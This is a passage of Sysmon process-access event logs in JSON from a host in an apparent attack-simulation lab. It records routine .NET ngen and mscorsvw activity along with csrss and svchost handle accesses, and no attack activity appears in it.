05:58:20.823","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010C2030D00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010C2030D00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010C2030D00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010C2030D00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010C2030D00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010D2060D00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010D2060D00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010D2060D00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010D2060D00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.870\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010D2060D00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.870","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010D2060D00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.886\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FD090D00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.886","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FD090D00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.886\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FD090D00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.886","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FD090D00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.902\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FD090D00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 